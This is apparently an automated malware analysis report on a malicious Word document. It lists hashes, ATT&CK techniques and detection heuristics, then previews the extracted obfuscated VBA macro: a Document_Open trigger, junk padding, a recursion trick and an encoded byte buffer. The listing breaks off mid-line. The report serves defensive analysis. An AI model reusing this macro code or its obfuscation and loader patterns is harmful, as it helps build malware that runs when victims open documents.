Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 28a3713293fa7d24…

MALICIOUS

Office (OLE)

333.0 KB · Created: 2016-01-20 15:55:00 · Authoring application: Microsoft Office Word · First seen: 2017-10-28
MD5: 4bf6423270e3e0e66333e4f7a9bc7740 SHA-1: 68e9529561a744c974a19dda6d720480060304e5 SHA-256: 28a3713293fa7d24f66a45e95c44228409739de6ba8ca99a88ffadae92aca044
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 (Visual Basic); T1059 (Command and Scripting Interpreter); T1204.002 (Malicious File)

The sample is a Microsoft Office document containing VBA macros. The 'Document_Open' macro is present and triggers the execution of the Shell() function, indicating an attempt to run an external process. This is a common technique for downloading and executing second-stage malware. No specific family could be identified.

Heuristics 5

  • VBA macros detected — medium — 3 related findings — OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA — critical — OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro — high — OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL — info — EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main — found in document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 123793 bytes
SHA-256: 35d1cf35e31c584f2952d829fd82f1934aa80cda8503b3b22780e1788ffa4b17
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: module-level byte buffer, 7495 elements (indices 0..7494 under
' the default Option Base 0, consistent with NKynj starting at zD(0)). The
' visible part of NKynj below fills it one literal value per statement. The
' code that reads the buffer back is not within the first 1,000 extracted
' lines shown here, so what the bytes encode is not established by this
' listing — treat it as an opaque embedded blob until the consumer is found.
Dim zD(7494) As Byte
Function zKK(JushwFhxEM As Integer) As Boolean
' Analyst note: the parameter JushwFhxEM is never read in the body.
' The `"xx" & "yy"` assignments to otherwise-unreferenced names
' (R2zUAoXdww3bkd, YAMiVZCF117dgq, OgRscICj, VGo34, Vm34ps, Hb4JlH4Dx8Xvc)
' do not influence the result; they look like padding interleaved with the
' few statements that matter — purpose presumed from their shape, not proven.
R2zUAoXdww3bkd = "6" & "66"
' Static: RDIMvY keeps its value across calls, which is what lets the
' counter below survive the nested call on the Debug.Assert line.
Static RDIMvY As Byte
YAMiVZCF117dgq = "43" & "54"
RDIMvY = RDIMvY + 1
OgRscICj = "83" & "8"
' Only an entry that sees the counter at 1 recurses. The nested call sees 2,
' skips this line, sets zKK = (2 = 0) = False, resets the counter to 0 and
' returns, so `Not False` satisfies the assert. Whether the Debug.Assert
' operand is evaluated at all when the macro runs outside the VBE is a
' Debug.Assert subtlety — trace both cases rather than assume one.
If RDIMvY = 1 Then Debug.Assert Not zKK(84)
VGo34 = "33" & "33"
' If the nested call ran, the counter is already 0 here and the result is
' True; if it did not run, this evaluates (1 = 0) = False. The return value
' therefore depends on the Debug.Assert behaviour noted above.
zKK = RDIMvY = 0
Vm34ps = "83" & "30"
' Counter reset so the next top-level call repeats the same sequence.
RDIMvY = 0
Hb4JlH4Dx8Xvc = "17" & "55"
End Function
Sub LQpw5n()
' Analyst note: every statement in this Sub either discards its result
' (Second, Partition, DateSerial, NPer, Tan, Atn) or assigns to a name that is
' never read again here (IpeKZxZllVC3d, Lv4tGeL, Au63TXr4CpYXD, V04JIOOAS,
' IEKvOuGYmBR). The only externally observable effect of the visible body is
' Beep. No call to Shell, zKK or NKynj appears here, and nothing in the visible
' listing (first 1,000 extracted lines) calls this Sub.
IpeKZxZllVC3d = "57" & "35"
Second 92
Partition 29, 67, 5, 93
Beep
DateSerial 73, 34, 51
NPer 52, 49, 59
Lv4tGeL = QBColor(30)
Tan 17
' CDec(31) = True compares 31 with True (-1 in VBA), so this branch should
' never be taken.
If CDec(31) = True Then Au63TXr4CpYXD = 88
Atn 14
' IsMissing is only True for an omitted Optional Variant argument; on the
' literal 13 it is False, so this assignment should never execute either.
If IsMissing(13) = True Then V04JIOOAS = 43
IEKvOuGYmBR = "21" & "40"
End Sub
Sub NKynj()
zD(0) = 168
zD(1) = 160
zD(2) = 162
zD(3) = 229
zD(4) = 174
zD(5) = 181
zD(6) = 6
zD(7) = 105
zD(8) = 116
zD(9) = 45
zD(10) = 77
zD(11) = 104
zD(12) = 28
zD(13) = 120
zD(14) = 60
zD(15) = 95
zD(16) = 37
zD(17) = 115
zD(18) = 73
zD(19) = 36
zD(20) = 112
zD(21) = 97
zD(22) = 1
zD(23) = 4
zD(24) = 106
zD(25) = 72
zD(26) = 10
zD(27) = 59
zD(28) = 49
zD(29) = 49
zD(30) = 84
zD(31) = 9
zD(32) = 42
zD(33) = 105
zD(34) = 105
zD(35) = 67
zD(36) = 51
zD(37) = 15
zD(38) = 0
zD(39) = 29
zD(40) = 10
zD(41) = 69
zD(42) = 78
zD(43) = 67
zD(44) = 51
zD(45) = 57
zD(46) = 62
zD(47) = 54
zD(48) = 111
zD(49) = 108
zD(50) = 112
zD(51) = 34
zD(52) = 40
zD(53) = 110
zD(54) = 38
zD(55) = 111
zD(56) = 111
zD(57) = 43
zD(58) = 34
zD(59) = 40
zD(60) = 65
zD(61) = 102
zD(62) = 99
zD(63) = 46
zD(64) = 68
zD(65) = 9
zD(66) = 99
zD(67) = 82
zD(68) = 95
zD(69) = 89
zD(70) = 26
zD(71) = 68
zD(72) = 6
zD(73) = 76
zD(74) = 48
zD(75) = 52
zD(76) = 99
zD(77) = 60
zD(78) = 113
zD(79) = 84
zD(80) = 13
zD(81) = 122
zD(82) = 87
zD(83) = 108
zD(84) = 45
zD(85) = 80
zD(86) = 38
zD(87) = 117
zD(88) = 40
zD(89) = 11
zD(90) = 45
zD(91) = 46
zD(92) = 68
zD(93) = 17
zD(94) = 8
zD(95) = 76
zD(96) = 23
zD(97) = 12
zD(98) = 51
zD(99) = 100
zD(100) = 36
zD(101) = 38
zD(102) = 25
zD(103) = 5
zD(104) = 104
zD(105) = 30
zD(106) = 28
zD(107) = 112
zD(108) = 26
zD(109) = 14
zD(110) = 12
zD(111) = 54
zD(112) = 13
zD(113) = 82
zD(114) = 0
zD(115) = 49
zD(116) = 52
zD(117) = 52
zD(118) = 5
zD(119) = 106
zD(120) = 100
zD(121) = 116
zD(122) = 111
zD(123) = 21
zD(124) = 121
zD(125) = 50
zD(126) = 88
zD(127) = 114
zD(128) = 156
zD(129) = 153
zD(130) = 164
zD(131) = 129
zD(132) = 255
zD(133) = 201
zD(134) = 240
zD(135) = 211
zD(136) = 235
zD(137) = 220
zD(138) = 152
zD(139) = 128
zD(140) = 143
zD(141) = 150
zD(142) = 159
zD(143) = 150
zD(144) = 132
zD(145) = 236
zD(146) = 200
zD(147) = 199
zD(148) = 130
zD(149) = 229
zD(150) = 157
zD(151) = 222
zD(152) = 212
zD(153) = 240
zD(154) = 228
zD(155) = 216
zD(156) = 248
zD(157) = 227
zD(158) = 129
zD(159) = 145
zD(160) = 182
zD(161) = 217
zD(162) = 128
zD(163) = 170
zD(164) = 239
zD(165) = 202
zD(166) = 233
zD(167) = 190
zD(168) = 202
zD(169) = 202
zD(170) = 130
zD(171) = 229
zD(172) = 240
zD(173) = 134
zD(174) = 207
zD(175) = 161
zD(176) = 138
zD(177) = 199
zD(178) = 194
zD(179) = 229
zD(180) = 181
zD(181) = 224
zD(182) = 201
zD(183) = 205
zD(184) = 239
zD(185) = 203
zD(186) = 233
zD(187) = 220
zD(188) = 243
zD(189) = 245
zD(190) = 183
zD(191) = 182
zD(192) = 191
zD(193) = 224
zD(194) = 212
zD(195) = 173
zD(196) = 136
zD(197) = 213
zD(198) = 220
zD(199) = 209
zD(200) = 226
zD(201) = 250
zD(202) = 205
zD(203) = 147
zD(204) = 130
zD(205) = 131
zD(206) = 167
zD(207) = 246
zD(208) = 145
zD(209) = 132
zD(210) = 148
zD(211) = 173
zD(212) = 129
zD(213) = 166
zD(214) = 156
zD(215) = 165
zD(216) = 138
zD(217) = 153
zD(218) = 169
zD(219) = 210
zD(220) = 202
zD(221) = 209
zD(222) = 219
zD(223) = 201
zD(224
... (truncated)